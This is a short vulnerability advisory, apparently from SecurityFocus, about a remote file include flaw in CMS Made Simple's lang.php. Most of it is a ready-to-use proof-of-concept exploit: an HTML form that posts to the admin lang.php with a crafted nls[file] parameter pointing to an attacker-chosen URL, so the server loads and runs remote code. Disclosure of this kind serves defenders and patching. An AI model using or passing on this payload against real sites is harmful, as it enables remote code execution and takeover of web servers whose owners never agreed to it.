CMS Made Simple Lang.PHP Remote File Include Vulnerability

No exploit is required:

A demonstration exploit html file is provided:

example.html:
<form action="http://www.example.com/admin/lang.php?CMS_ADMIN_PAGE=1&nls[file][vx][vxsfx]=(__URL__)" method=post>
<input type=hidden name=change_cms_lang value=vx>
<input type=submit name=test VALUE="do it">
</form>
EOF


 

Privacy Statement
Copyright 2010, SecurityFocus